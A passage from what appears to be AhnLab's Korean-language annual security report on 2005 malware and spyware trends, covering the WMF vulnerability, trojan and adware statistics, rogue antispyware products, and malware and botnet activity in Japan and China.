또한안티바이러스컨포런스나해외유명보안컨포런스에서도 은폐기법 과관련된주제는반드시포함하고있을정도로안티바이러스, 보안전문가그리고일반사용자들에게중요한이슈가되어버렸다. 지금도사용자시스템깊숙한곳에자신의존재를숨기며동작하는은폐형악성코드가상당수에있을것이라고추정된다. 향후에는은폐기법이안티바이러스로부터의 회피 와은폐형악성코드 진단 이라는대립양상을보일것으로생각된다.

16 I. 2005 년 AhnLab 악성코드동향 WMF 취약점공개로긴장하였던 2005년말 2005년을얼마남겨두지않고 *.WMF 이미지처리에대한취약점이공개되었다. 이취약점이초미의이슈가되었던이유는 MS의보안패치가공개되기전에해당취약점이알려졌기때문이다. 취약점을연구하는보안업체들은관례상취약점을갖고있는응용프로그램제작사에먼저취약점사실을알리고해당업체가패치파일을내놓으면취약점내용을공개한다. 하지만이번경우는그반대로언더의한개인이이공격방법을찾아내 MS가보안패치를내놓기전에공개하였다. 따라서이취약점은대부분의윈도우가그대상이되고보안패치가나오지않았던상황이었기때문에최고의위험도를가지고있었다. 하지만확산력측면에서는웹방문이나메일, 메신저에첨부된파일실행등수동적인사용자의개입이필요하기때문에웜과같이일시에급속하게확산되는웜과같은유형에서는사용될수없어확산도는낮았다. 그래서일부보안전문가사이에서는이취약점이자체확산력을가진형태로발전할수없기때문에위험도는과장되었다고주장하기도하였다. 또한이공격에대하여우리가흔히알고있는버퍼오버플로우공격유무에대하여일부보안전문가들사이에서논의가있기도하였다. 현재밝혀진것은그래픽렌더링엔진으로불리우는 GDI32.DLL의정상적인펑션처리에대한취약점이었으며, 대부분의윈도우가이취약점을가지고있었다. 취약점이알려지면서조작된 *.WMF 파일은폭발적으로쏟아져나왔다. 조작된 *.WMF 파일내부에는암호화된쉘코드가포함되어있고해당함수의정상적인핸들처리로쉘코드가실행되는데, 분석해본결과특정호스트에업로드된스파이웨어설치프로그램이나트로이목마와같은악성코드를다운로드하는코드였다. 특히이취약점은이미지파일이므로이를웹사이트에올려두거나메일이나메신저로다른이미지포맷의확장자로변경유포하기도하였다. V3에서는조작된모든 *.WMF 파일을진단하기위한진단방법을개발하여 Win-Trojan/Exploit- WMF.Gen 이라는진단명으로이파일들을진단한다. 지금까지 2005년한해를달구었던악성코드의주요이슈에대하여알아보았다. 이외에도베이글웜 (Win32/Bagle.worm) 이자체네트워크를구성하며끊임없이자신을확산, 유지한다는것이알려졌다. 향후에도베이글웜과관련악성코드는지속적으로우리를괴롭힐것으로예상된다. 또한악성아이알씨봇웜의네트워크인봇넷의조직화, 통제력이강화되었다. 봇제작자들은정교하게공격대상과방법을선택할수있도록그모습을갖추었다. 따라서악성봇을이용한악의적인공격의정교화는더욱문제가될가능성이높다. 2005 년신종 ( 변형 ) 악성코드유형별현황 다음은 2004, 2005 년신종 ( 변형 ) 악성코드의월건수를종합해본표이다.

17 I. 2005 년 AhnLab 악성코드동향 800 700 629 2005년 2004년 600 526 500 464 476 462 400 300 200 301 125 286 261 305 216 233 365 278 304 230 236 225 371 175 329 212 284 285 100 1 월 2 월 3 월 4 월 5 월 6 월 7 월 8 월 9 월 10 월 11 월 12 월 [ 그림 12] 2004, 2005 년월별신종 ( 변형 ) 악성코드건수 [ 그림12] 를보면전년과비교하여 2005년에발견된신종 ( 변형 ) 악성코드수는크게감소하였다. 그러나유형별로신종 ( 변형 ) 악성코드증감추이를살펴보면트로이목마가급증한것을볼수있다. 백도어및다운로더그리고프록시서버류와같은 V3 엔진에추가되는모든유형의트로이목마에대한 2004, 2005년비교통계를살펴보면 [ 그림13] 과같다. 200 2005 년 189 150 100 50 84 50 130 43 87 75 111 98 132 32 142 59 102 80 123 87 2004년 136 116 101 93 95 82 120 0 1 월 2 월 3 월 4 월 5 월 6 월 7 월 8 월 9 월 10 월 11 월 12 월 [ 그림 13] 2004, 2005 년월별신종 ( 변형 ) 트로이목마발견건수 트로이목마가증가한원인은앞서서얘기한것처럼중국發해킹을통해온라인게임사용자계정을탈취하는유형의트로이목마와전통적인백도어형태의트로이목마가크게증가했기때문이다. 그외에다른악성코드를다운로드받는다운로더류와공격자의특정한목적을위해서만들어진에이전트류도크게증가하였다. 트로이목마들이주로사용자정보를탈취하는데그목적이있고최근악성코드제작동기가금전적인이익을얻기위한것이라는점을감안하면전체악성코드중트로이목마가차지하는비율은점점증가할것으로보인다. 2004, 2005년비교를통하여악성코드유형별비율을확인해보면 [ 그림14], [ 그림 15] 와같다.

18 I. 2005 년 AhnLab 악성코드동향 스크립트 1% 드롭퍼 2% 파일 0% 리눅스 0% 매크로 0% 파일 0% 스크립트 2% 매크로 0% 유해가능 5% 트로이목마 21% 드롭퍼 9% 웜 38% 웜 21% 트로이목마 46% [ 그림 14] 2004 년발견된신종 ( 변형 ) [ 그림 15] 2005 년발견된신종 ( 변형 ) 악성코드유형비율 악성코드유형비율 2004년은악성아이알씨봇웜변형발견이급증하면서다른유형에비해웜비율이상대적으로높았던것을알수있다. 전체적으로웜에대하여치우치고있으며이는그당시악성코드제작자의제작동향을잘반영한예이기도하다. [ 그림15] 는 2005년에발견된신종 ( 변형 ) 의유형별비율이다. 2005년에는트로이목마, 드롭퍼 (Dropper) 의비율이전년과비교하여높아졌다. 드롭퍼는다른악성코드를 Drop하는형태로, 대부분트로이목마를 Drop 한다. 따라서트로이목마의비율이높아지면서함께그비율도높아졌다. 2005년에는전년에없었던유해가능항목이추가되었다. 유해가능프로그램은정상적인목적으로만들어졌지만공격자가악의적인목적을가지고사용하는프로그램들을주로일컫는다. 또한일부피해가심각한스파이웨어들도포함된다. 유해가능프로그램이차지하는비율도증가하고있는데그원인은대부분의유해가능프로그램들이해킹목적에사용되기때문이며주로 FTP 데몬, 원격제어툴, 취약점스캐너와같은프로그램들이다. 이들프로그램은원래는정상프로그램이지만공격자들이이를악용하여자신의목적에맞게변형해원래의의도와는다르게사용하곤한다. 다음은 2005년도한해어떤악성코드의변형비율이많았는지에대한통계이다. 이비율은또한어떤악성코드에대하여사용자들이주로피해를입었는지에대한자료가되기도한다.

19 I. 2005 년 AhnLab 악성코드동향 Win32/Mytob.worm Win-Trojan/StartPage Win-Trojan/LmirHack Win-Trojan/LineageHack Win-Trojan/Bancos 6% 3% 3% 4% 4% Win32/IRCBot.worm 33% 3 이자료에대한통계는국내뿐아니라해외등다양한경로로수집된샘플과그데이터에따른것으로, 국내상황과는약간다른양상을보이고있다. Win-Trojan/Downloader 11% Win-Trojan/Agent 11% 12% 13% Win-Trojan/Banker Win-Trojan/Xema [ 그림 16] 2005 년발견된악성코드변형 Top 10 현황 [ 그림16] 에서알수있듯이악성아이알씨봇에대한비율이높았다.3 그외2005년악성코드변형발견 Top 10에는리니지핵트로이목마, 엘미르핵트로이목마 (Win- Trojan/LmirHack) 등온라인게임의사용자계정을훔쳐내는악성코드가 2개나랭크되어있다. 그리고해외에서그변형수가많은뱅커트로이목마 (Win-Trojan/ Banker), 반코스트로이목마 (Win-Trojan/Bancos) 는주로금융관련정보를탈취하는악성코드이다. 두번째로많은제마트로이목마 (Win-Trojan/Xema) 는일반적으로특별한진단명을갖고있지않는유형이나타사에서에이전트, 델프라고일컫는트로이목마가주로해당된다. 끝으로 2004, 2005 년도국산 / 외산악성코드동향을분석해보도록하겠다. 5000 4000 2005 년 2004 년 4511 3000 2988 2000 1000 0 71 국산 21 외산 [ 그림 17] 2004 년, 2005 년발견된신종 ( 변형 ) 의악성코드제작지별현황 2004년에발견된국산악성코드는대부분애드웨어로, 2004년부터피해가보고되기시작하여 2005년에는그피해의폭의대폭증가하였다. 반면 2005년에발견된국산악성코드는 2004년에비해수치적으로감소하였고, 대부분스팸메일러였다. 이악성코드들은특정국내대형포털의 SMTP 주소를릴레이

20 I. 2005 년 AhnLab 악성코드동향 하며주로그곳의게시판등을통하여사용자시스템에설치된다. 스팸메일러는 2004년부터존재하였지만 2005년에그실체가조금씩밝혀졌다. 그것은국산스팸메일러나온라인게임해킹프로그램등을제작하는부류들이바로누군가로부터검은제의를받거나또는스스로연구목적으로개발하는학생또는일반인이었다는것이다.. 비록이들이심각한피해를주는바이러스나사용자정보를유출하는트로이목마를만들어내지는않았지만현재하고있는일이정당하지못한건사실이다. 이와같은검은제의나개인목적으로자신의홈페이지, 블로그또는정보사이트라는미명하에이런프로그램들이공개되거나심지어는다시이를재판매하는경우가많아지고있다. 아마도금전적인이득이목적인이들은자신의실력과시가목적인악성코드의제작등에는앞으로도관심을보이지않을것으로보인다. 이상으로 2005년신종 ( 변형 ) 악성코드발견동향을살펴보았다. 2005년은서두에서밝혔던것처럼많은악성코드제작이금전적인이익때문에발생하였다. 이는또한악성코드의공격과확산형태가국지적인양상으로변모하는데도기인하였다. 정교해지고통제력을갖춘악성아이알씨봇웜, 국내에는별다른피해를주지못했던조톱웜, 그리고국내를비롯한아시아지역에큰피해를준중국發해킹등이앞으로도악성코드의국지적인양상이계속될것이라는것을예고하고있다. 이는과거처럼무조건확산되고단시간내소멸되는양상이아니라공격대상과방법그리고이후확장과유지등악성코드의전반적인것들이조직화되고통제력을갖추고있다는것을의미한다. 2006년은새로운윈도우가출시되고또한웹을통한새로운서비스가늘어날전망이다. 어떤환경이든지악성코드의공격과제작은시도될것으로예측된다. ASEC

II. 2005 년 AhnLab 스파이웨어동향 작성자 : 김정석주임연구원 (js_kim@ahnlab.com) 2005년에는스파이웨어, 애드웨어와같은유해가능프로그램이개인 PC 보안의최대위협중하나로자리잡으면서수많은종류의유해가능프로그램이발견되었다. 수적증가외에도 2005년에는중요개인정보를유출하거나윈도우의보안설정과같은중요시스템설정을변경하는등심각한피해를입히는유해가능프로그램이증가하였으며, 사생활을침해하거나원하지않는광고로불편을주는수준에서사용자에게금전적인손실을입히거나시스템에직접적인피해를입히는수준으로변화하는등유해가능프로그램에의한위협도크게증가하였다. 애드웨어스파이웨어다운로더드롭퍼클리커다이얼러익스플로잇기타계 3314 2312 2317 372 399 941 44 18 9717 [ 표 1] 2005 년발견된유해가능프로그램현황 익스플로잇 0% 기타 0% 클리커 다이얼러 드롭퍼 4% 10% 4% 애드웨어 34% 다운로더 24% 스파이웨어 24% [ 그림 1] 2005 년발견된유해가능프로그램의유형별비율 [ 표1] 과 [ 그림1] 에서보는것과같이 2005년발견된유해가능프로그램중애드웨어가가장높은비율인 34% 를차지하고있다. 특히애드웨어에대한피해가확산되고사용자가이런프로그램에대해인지하기시작하면서불특정웹사이트방문시 ActiveX로설치를유도하거나 P2P 파일공유프로그램, 스크린세이버와같은무료제공프로그램의번들로설치되는전형적인설치방법으로는배포가어렵게되자, 이에대한대안으로다운로더계열의유해가능프로그램에의하여설치되는사례가많이발견되었다. [ 표1] 과 [ 그림1] 에서 24% 의비율을보인다운로더는애드웨어와같은유해가능프로그램에의한피해를확산시킨주범이다. 에이전트 (Win-Downloader/Agent) 계열의다운로더는시작프로그램에등록되어윈도우가시작될때마다제어서버에접속하여유해가능프로그램을다운로드한다. 특정웹사이트에서애드웨어나스파이웨

22 II. 2005 년 AhnLab 스파이웨어동향 어의설치파일을다운로드하고실행하는단순한형태에서방화벽을우회하기위해윈도우탐색기나인터넷익스플로러에인젝션되어실행하거나, 루트킷을사용하여실행중인사실을은폐하는등악성코드에서사용하는고급기술을사용하는형태까지여러형태의다운로더가발견되었다. 또한애드웨어나스파이웨어등의유해가능프로그램을설치하기위한목적으로악성아이알씨봇에감염된좀비시스템을이용하여배포하거나, 인터넷익스플로러의보안취약점을공격하여스팸이나팝업광고에의해방문이유도되는웹사이트에서제작배포되기도하였다. 다운로더와동일한 24% 의비율을보인스파이웨어도다운로더에의해설치되는사례가많았으며, 사용자동의없이브라우저설정을변경하는로존스파이웨어 (Win- Spyware/LowZones), 스타트페이지스파이웨어 (Win-Spyware/StartPage) 의피해가많이접수되었다. 로존스파이웨어는사용자동의없이인터넷익스플로러의보안설정을낮게변경하고악의적인컨텐츠가포함된웹사이트를팝업으로노출하여, 대량의애드웨어나스파이웨어의설치를시도한다. 로존스파이웨어의큰문제는사용자가인터넷익스플로러의보안설정이낮게변경된사실을인지할수없으며웹사이트방문만으로원하지않는 ActiveX 컨트롤이설치되는데있다. 스파이웨어의감염이확산되면서허위, 과장된검사결과를보여주고유료사용을유도하는허위안티스파이웨어프로그램 (Rogue/Suspected Antispyware Program) 이크게증가하였다. 2005년많은피해를입힌허위안티스파이웨어프로그램 Top 5를순위별로나열하면다음과같다. - 스파이엑스 (Win-Adware/Rogue.SpyAxe) - 피에스가드 (Win-Adware/Rogue/PSGuard) - 스파이쉐리프 (Win-Adware/Rogue.SpySheriff) - 레이지스파이웨어 (Win-Adware/Rogue.RazeSpyware) - 월드안티스파이 (Win-Adware/Rogue.WorldAntiSpy) 이러한허위안티스파이웨어프로그램은다운로더나다른유해가능프로그램에의하여사용자동의없이설치되고실행되기도하지만, 사용자를속여유료사용을유도하는교묘한수법을사용하기도한다. 클리커훼이크얼럿 (Win-Clicker/FakeAlert) 은바탕화면을변경하거나시스템트레이에풍선도움말형식의허위경고메시지를표시하여, 이를클릭하는경우허위안티스파이웨어프로그램의설치를안내하는웹사이트를띄우고설치와검사를유도한다. 이는 당신의컴퓨터가스파이웨어에감염되었다. 는허위경고메시지를띄우고사용자에게큰불편을주는바탕화면변경등의시스템설정을변경하여, 이를제거하기위해사용자들의안티스파이웨어유료이용을유도하는것이다.

23 II. 2005 년 AhnLab 스파이웨어동향 2005 년발견된애드웨어의유형별특징 1 팝업광고 2 툴바 3 BHO 4 바로가기 5 기타 [ 표 2] 애드웨어유형별피해 Top 5 [ 표2] 는 2005년발견된애드웨어의유형별피해순위이다. 대표적인기능을가진애드웨어를순위화하였으며, 이중두가지이상의유형을동시에가지는애드웨어도많이발견되었다. 사용자에게원하지않는광고를팝업형식으로노출하는애드웨어가가장많이발견되었으며, 이외에도 BHO를이용하여사용자가브라우저에입력하는키워드를감시하여제어서버에전송하거나팝업광고를노출하는유형의애드웨어가많이발견되었다. 인터넷익스플로러에원하지않는도구모음을추가하는툴바도많이발견되었다. 엘리트바애드웨어 (Win-Adware/EliteBar) 의경우루트킷을이용해실행중인프로세스와일부구성요소를은폐하여, 사용자가제거한후에도동의없이재설치되어많은피해를입힌애드웨어중하나이다. 특정웹사이트의바로가기를설치하는애드웨어도여러가지변형이많이발견되었다. 특히국내에서많은피해를입힌베스트코드 (Bestcode), 인비 (INBEE) 같은바로가기는포털사이트의게시판블로그등의불특정웹사이트에서 ActiveX 형태로대량배포되었으며, 비교적제작이간단하고변형이쉽기때문에주요특징은동일하고바로가기대상만다른변형이다수발견되었다. 2005년 4월에는이런바로가기설치유형의애드웨어제작자가형사처벌되는사건도있었다. 2005년가장많은피해를입힌애드웨어로는다운로더에의해설치되는엔케이스애드웨어 (Win-Adware/nCase), 아이에스티바애드웨어 (Win-Adware/ISTbar), 바겐버디애드웨어 (Win-Adware/BargianBuddy), 미디어티켓츠애드웨어 (Win- Adware/MediaTickets) 가있다. 국내에서는캐쉬세이버애드웨어 (Win-Adware/CashSaver), 베스트코드애드웨어 (Win-Adware/Shortcut.Bestcode) 가많은사용자들에게피해를입혔다. 2005 년발견된스파이웨어의유형별특징 1 스타트페이지 (Startpage) 2 에이전트 (Agent) 3 프락시 (Proxy) 4 PWS 5 로존 (LowZones) [ 표 3] 스파이웨어유형별피해 Top 5 [ 표3] 은 2005년발견된스파이웨어의유형별피해순위이다. 인터넷익스플로러의시작페이지를사용자가원하지않는웹페이지로변경하고고정하는스타트페이지스

24 II. 2005 년 AhnLab 스파이웨어동향 파이웨어 (Win-Spyware/StartPage) 는매우다양한형태가발견되었으며, 피해도많이접수되었다. 다른유해가능프로그램에의하여사용자동의없이설치되는에이전트스파이웨어 (Win-Spyware/Agent) 는감염된시스템의 URL 탐색기록, 설치정보등을제어서버에전송하며, 불특정포트를열고공격자의명령을기다리기도한다. 에이전트유형의스파이웨어는보통윈도우시작프로그램으로등록되어백그라운드프로세스로동작하며, 방화벽등을우회하기위하여윈도우 XP 서비스팩 2의방화벽설정을변경하거나, 윈도우탐색기나인터넷익스플로러에인젝션된형태로동작하기도한다. 온라인게임이나웹사이트의계정정보를유출하는 PWS(Password- Stealing) 유형의스파이웨어가증가한것도 2005년스파이웨어동향의큰특징이다. 중국발해킹에의해변조된웹페이지를통해인터넷익스플로러의보안취약점패치가적용되지않은시스템에스파이웨어가설치된피해가다수보고되었는데, 이스파이웨어는국내유명온라인게임의계정을유출할목적으로제작되었다. ASEC

III. 2005 년세계악성코드동향 작성자 : 김소헌주임연구원 / 장영준연구원 / 차민석주임연구원 1. 일본의악성코드동향 김소헌주임연구원 (sohkim@ahnlab.com) 2005년일본악성코드동향의가장큰특징은이메일을통해전파되는웜의피해가전년도에이어서여전히계속되고있는점이다. 감염피해를발생시키는주요악성코드들도 2004년과비교해서크게차이가없다. 2004년에최초로발견된넷스카이웜이나베이글웜은 2005년에도지속적으로변형들이배포되어많은감염피해를유발하고있으며클레즈웜 (Win32/Klez.worm) 또한발견된지몇년이지난현재에도여전히많은감염피해를유발하고있다. 다만 2005년 2월최초로발견된마이톱웜이현재까지도매우많은감염피해를입히고있는점만이 2004년과차이가있을뿐이다. 그러나전체적으로이메일웜들의감염피해는점점줄어들고있다. 연도별악성코드감염피해통계 [ 그림1] 은일본의 IPA(www.ipa.og.jp) 에서발표한연도별악성코드신고건수에대한통계이다. 6000 5000 4000 신고건수감염피해 5439 5422 5404 5308 5091 5021 4832 4905 4880 4928 4846 4723 4654 4536 4440 4470 4150 4012 4028 4071 3816 3000 2000 1000 2014 1794 1786 1602 1458 1452 1401 1411 1158 1052 1187 1110 431 1323 1733 0 53 62 62 66 59 57 50 140 77 79 66 75 43 82 69 72 56 76 57 31 12 41 23 18 31 8 12 28 39 17 13 23 11 6 1월 3월 5월 7월 9월 11월 2월 4월 6월 8월 10월 12월 1월 3월 5월 7월 9월 11월 2003년 2004년 2005년 [ 그림 1] 연도별악성코드신고건수통계 ( 출처 : IPA) 이메일웜이다량으로발견되기시작한 2004년 5월이후줄어들지않던악성코드신고건수가 2005년 7월을기점으로점차줄어들고있는것을알수있다. 이러한감소의원인은여러가지가있겠지만 2004년에비해일본에서많이확산되고있는이메일웜변형들의피해가감소하였고자피웜과같이타지역에서많이확산중인이메일웜들이일본에서는언어의문제등으로감염피해가미비했기때문으로보인다. 악성코드감염경로별통계 악성코드의감염경로로가장많이이용된매체는이메일이다. 메일을통한감염피해

26 III. 2005 년세계악성코드동향 는전체감염피해의 97% 정도로매우높게나타났다. 한가지주목할점은 8월부터네트워크를통한악성코드의감염피해가증가하기시작한것이다. 1 월 2월 3월 4월 5월 기타네트워크다운로드 6 월 외부의모체 7월 8월 메일 9 월 10 월 11 월 0 1000 2000 3000 4000 5000 6000 [ 그림 2] 악성코드감염경로통계 ( 출처 : IPA) 이와같은현상이나타난원인은안티니웜 (Win32/Anntiny.worm) 이나아이알씨봇 (Win32/IRCBot.worm) 과같이네트워크를통해전파되는악성코드들의감염피해가증가했기때문이다. 일본의경우 P2P 프로그램을이용하여전파되는안티니웜으로인한피해가몇년째계속되고있고네트워크취약점을이용해서전파되는악성코드의감염또한지속적으로증가하는추세이다. 켈비르웜이나브로피아웜과같은메신저웜의변형이한해동안많이발생한것도원인이될수있다. 그에비해이메일을통한감염피해는점점줄어들고있는것을볼수있는데이러한네트워크를이용한감염증가와이메일웜의피해감소현상은 2006년에도계속될것으로생각된다. 악성코드유형별피해통계 2005년한해동안일본에서가장많은감염피해를입힌악성코드는넷스카이웜등이메일을이용해전파되는유형의악성코드이다. 메일을이용한감염은전체감염피해의 90% 이상을차지하고있을정도로매우높게나타나고있다. [ 그림3] 은 2005년일본의악성코드종류별피해통계를나타낸것이다. 가장많은감염피해를입힌악성코드는넷스카이웜인것을확인할수있다.

27 III. 2005 년세계악성코드동향 W32/Bugbear 4% W32/Bagz 5% W32/Zafi 5.5% W32/Klez 7% W32/Sober 1.5% W32/Netsky 34% W32/Lovgate 8% W32/Mydoom W32/Mytob 11% 13% W32/Bagle 11% [ 그림 3] 악성코드종류별감염피해통계 ( 출처 : IPA) 넷스카이웜은 2004년초최초로발견된이래로현재까지도여러변형들이계속발견되고있는매스메일러이다. 넷스카이웜이외에도마이톱웜을제외한대부분의악성코드가예전부터계속활동을하고있는악성코드임을알수있고심지어는클레즈웜과같이몇년전부터계속감염피해를입히고있는악성코드도확인할수있다. [ 그림4] 는매크로와스크립트바이러스의확산통계이다. 매크로바이러스중에는라록스바이러스가가장많은감염신고를기록하고있고, 스크립트바이러스중에는레드롤프바이러스가가장많이감염된것을알수있다. 이들악성코드들이전체감염피해에서차지하고있는비중은매우낮지만몇년전부터사라지지않고지속적으로피해가발생하고있다. W97M/Bables 3% WM/Cap 4% X97M/Divi 9% etc 14% XM/Laroux 46% Tristate 11% XF/Sic 13% [ 그림 4] 일본의 2005 년매크로바이러스감염피해현황 ( 출처 : IPA)

28 III. 2005 년세계악성코드동향 Wscript/Kakworm VBS/Freelink 1% VBS/Soraci 1% 4% Wscript/Fortnight 6% VBS/Loveletter 10% etc 3% VBS/Redlof 75% [ 그림 5] 일본의 2005 년스크립트바이러스감염피해현황 ( 출처 : IPA) 월별악성코드피해통계아래의 [ 그림6] 은 2005년월별악성코드피해통계이다. 통계데이터의내용중몇가지주목할만한점은전월에걸쳐넷스카이웜의피해가가장많이발생하고있는것과 2005년최초로발견된마이톱웜이 3월부터점차피해건수가증가하는것이다. 전체적으로감염피해가감소하고있는것또한주목해야할점이다. 2005년 7월을기점으로피해정도가대부분감소하고있는것을볼수있다. 1 월 2월 3월 4월 5월 6월 7월 8월 9월 10월 11월 W32/Sober W32/Bugbear W32/Bagz W32/Zafi W32/Klez W32/Lovgate W32/Mydoom W32/Bagle W32/Mytob W32/Netsky 0 500 1000 1500 2000 2500 3000 3500 [ 그림 6] 일본의 2005 년월별악성코드피해통계 ( 출처 : IPA) 마이톱웜의경우최근까지도여러변형이지속적으로발견되고있으므로 2006년에도비슷한규모의감염피해는당분간계속될것으로생각된다. 2003년말최초로발견된이후 2005년초까지계속확산되었으나, 그이후에피해가급격하게감소되었던소버웜이 11월에들어새롭게확산되기시작한점또한특이할만하다. 소버웜의경우다량의메일을지속적으로배포하는특성을가지고있고한꺼번에다량의메일을발송하는등전파력이강하기때문에외국에서는많은피해가보고되었으나일본은상대적으로피해가미비한수준이었다.

29 III. 2005 년세계악성코드동향 2. 중국의악성코드동향 장영준연구원 (zhang95@ahnlab.com) 2005년중국악성코드는 2004년과비교하여악성코드형태에대한많은변화가있었다. 2004년은메일로전파되는매스메일러웜과네트워크로전파되는웜들로대표되는한해였다면, 2005년은트로이목마와백도어로대변되는해라고할수있다. 2005년이전까지만하더라도트로이목마류는그특성상급속히확산되기가어려웠었으나최근에는그통념을깨고제 3의매개체를통하여급속한확산을시도하게되었다. 그리고루트킷 (RootKit) 과같은은폐기법을트로이목마에접목시켜감염된시스템의사용자가이를확인하기가더욱어렵게되었다. 뿐만아니라트로이목마의제작목적또한예년과달리금전적인목적을위해서제작하는새로운계기가되었던것으로보여진다. 그리고트로이목마의형태역시전통적인틀에서벗어나다양한형태가등장하기시작하였다. 1 이자료에대한통계는국내뿐아니라해외등다양한경로로수집된샘플과그데이터에따른것으로, 국내상황과는약간다른양상을보이고있다. 중국백신업체들을통해서본중국악성코드중국로컬백신업체인라이징 (Rising) 과강민 (JiangMin) 의 2005년중국악성코드동향에서도역시트로이목마가절대적인위치를차지하고있었다. 그리고트로이목마의개수면에서도예년과비교할수없을정도로엄청난증가치를보여주었다. 80 70 60 50 40 30 Trojan Worm 20 10 0 1월 3월 4월 5월 6월 7월 8월 9월 10월 11월 [ 그림7] 2005년중국악성코드월별트로이목마와웜분포현황 ( 출처 : Rising)1 12 월 [ 그림7] 은중국로컬백신업체인라이징 (Rising) 의월별트로이목마와웜의분포도이다. 2005년 1월부터 7월까지는 2004년동향과유사하게매스메일러웜과네트워크로전파되는웜들이중국악성코드동향의전반을이루고있었다. 그러나 8월을기점으로하여웜은급격한하락을보여준반면트로이목마는상승세를이루면서급격한증가를 12월까지계속이어갔다. 트로이목마가일시적인증가세를보였던 4월과 5월에는 QQPass 트로이목마 (V3 진단명 Win-Trojan/QQPass), 스타트페이지트로이목마 (V3 진단명 Win-Trojan/ StartPage) 와그레이버드트로이목마 (V3 진단명 Win-Trojan/GrayBird) 그리고엘미르핵트로이목마 (V3 진단명 Win-Trojan/LmirHack) 가등장하기시작하였다. 그리고본격적인트로이목마의증가세를보이기시작한 8월이후에는 QQMsg 트로이목마 (V3 진단명 Win-Trojan/QQMsg), 에이전트트로이목마 (V3 진단명 Win- Trojan/Agent), QQRob 트로이목마 (V3 진단명 Win-Trojan/QQRob) 와다운로더트로이목마 (V3 진단명 Win-Trojan/Downloader) 등다양한트로이목마형태들이발견되었다.

30 III. 2005 년세계악성코드동향 80 70 60 Network Worm Mass Mailer 50 40 30 20 10 0 1 월 3 월 4 월 5 월 6 월 7 월 8 월 9 월 10 월 11 월 12 월 [ 그림 8] 2005 년중국의전파방법별웜분포현황 ( 출처 : Rising) [ 그림8] 은웜을메일로전파되는매스메일러웜과네트워크로전파되는웜으로구분하여월별로변화추이를나타낸것이다. [ 그림8] 을보면매스메일러는 5월을기점으로최고치를보인이후지속적인하락세를보였었다. 그리고 8월이후라이징의통계에서매스메일러웜은순위에서도찾아볼수가없게되었다. 매스메일러웜들이강세를보였던 1월에서 5월사이에많이확산되었던매스메일러웜은백쯔웜 (V3진단명 Win32/Bagz.worm) 과넷스카이웜을들수있다. 그리고하락세로이어지던 6월에는마이톱웜이일시적인확산을보였었다. 이와달리네트워크로전파되는웜은 1월에는매스메일러보다높은수치를보였으나그이후지속적인하락세를그리다 7월에잠시최고치를기록하며다시상승세를보였다. 그러나 [ 그림7] 에서와같이 8월에서부터트로이목마가증가세를보이기시작한이후에는매스메일러웜과같이하락세를그리며 11월라이징통계에서는순위권에서완전히밀려나게되었다. 네트워크로전파되는웜은시기에상관없이악성아이알씨봇웜이대세를이루고있었다. 매스메일러와네트워크로전파되는웜들외에도 3월에는 MSN 메신저프로그램으로전파된브로피아웜이급속한확산을보였었다. 그러나 2005년한해동안중국악성코드동향에서는브로피아웜과같이인터넷메시징프로그램을확산경로로이용한웜은브로피아웜을제외하고는순위권에포함되지않았다. 순위 강민 (JiangMin) 진단명 안철수연구소진단명 1 Backdoor/SdBot.atp.Rootkit Win32/IRCBot.worm 2 Backdoor/Huigezi Win-Trojan/GrayBird Win-Trojan/Hupigon 3 Exploit.MhtRedir HTML/MhtRedir 4 Trojan/QQMsg.Zigui Win-Trojan/QQMsg 5 I-Worm/Mytob Win32/Mytob.worm 6 I-Worm/DropBot Win32/Bropia.worm 7 Backdoor/PcClient Win-Trojan/PcClient 8 I-Worm/Zobot Win32/Zotob.worm 9 I-Worm/Sober Win32/Sober.worm 10 Trojan/PSW.QQRobber Win-Trojan/QQRob [ 표 1] 강민이발표한 2005 년중국악성코드 TOP 10

31 III. 2005 년세계악성코드동향 [ 표1] 은중국로컬백신업체중하나인강민 (JiagMin) 의 2005년중국악성코드 TOP 10이다. 강민의통계에서는은폐기능을수행하는악성아이알씨봇웜이 1위를차지하고있었고그뒤를이어 2위는그레이버드트로이목마가차지하였다. 강민의 2005 년악성코드 TOP 5에는마이톱웜, 조톱웜그리고소버웜이순위에포함되어있으며트로이목마로는 QQMsg 트로이목마와 QQRob 트로이목마가포함되어있다. 스크립트로는유일하게 Exploit.MhtRedir(V3 진단명 HTML/MhtRedir) 이순위에포함되어있다. Trojan/PSW.QQRobber I-Worm/Sober 7% 8% I-Worm/Zobot 8% 18% Backdoor/SdBot.atp.Rootkit Backdoor/PcClient 8% 13% Backdoor/Huigezi 9% 11% I-Worm/DropBot 9% 9% Exploit.MhtRedir I-Worm/Mytob Trojan/QQMsg.Zigui [ 그림 9] 강민이발표한 2005 년중국악성코드 TOP 10 분포 [ 그림9] 는강민에서발표한중국악성코드 TOP 10을나타낸것이다. TOP 10에포함되어있는악성코드들간의감염피해에대한차이가크지않고대부분비슷한수치를이루고있다. 스크립트 기타 18% 웜 3% 3% 트로이목마 44% 백도어 32% [ 그림 10] 강민 2005 년중국악성코드형태별분류 [ 그림10] 은강민의 2005년피해가보고된중국악성코드의형태별분류이다. 강민의 2005년중국악성코드동향보고서에따르면 2005년한해동안접수된악성코드는총 37,497건으로, 이중트로이목마는 17,148건, 백도어는 12,019건, 스크립트악성코드는 1,108건그리고웜은 955건이며기타악성코드는 6,717건으로발표했다. 이

32 III. 2005 년세계악성코드동향 보고서역시앞서이야기한라이징의악성코드분포와동일하게트로이목마와백도어가전체의 76% 를차지하며전체악성코드분포의절대적인수치를차지하고있다. 다수의봇넷 (BotNet) 이발견된중국네트워크 2004년부터급속한확산을보였던아이알씨봇웜은 2005년한해동안에도중국내에서큰피해를입혔다. 특히아이알씨봇웜은네트워크를통해보안패치가설치되지않은시스템으로급속히확산되어단시간에많은시스템을감염시킬수있었다. 이렇게감염된시스템은좀비 (Zombie) 라불리며, 좀비시스템이형성한네트워크를봇넷 (BotNet) 이라고지칭한다. 중국국가컴퓨터바이러스대응중심의보고에따르면 2005년 6월에서 9월까지중급이상규모의봇넷이 59개가발견되었으며, 이시기에는거의매일3만개이상의좀비시스템을보유한봇넷이발견되었다고한다. 그리고 8월에서 9월사이에는 15만개이상의좀비시스템을보유한대형봇넷도발견되었다고한다. 아이알씨봇웜자체가백도어기능을가지고있어, 이에감염된시스템은프로그램의설치나실행등악성코드배포자가원하는행위를마음대로조정할수있게된다. 따라서, 대형봇넷은이를조종하는악의적인해커에의해다양한사이버범죄에이용되는등네트워크상의새로운위협으로발전할가능성이높다. 세계 2차대전종전기념일의일본에대한사이버공격 2005년은제2차대전종전 60주년으로아시아의중국과한국그리고일본 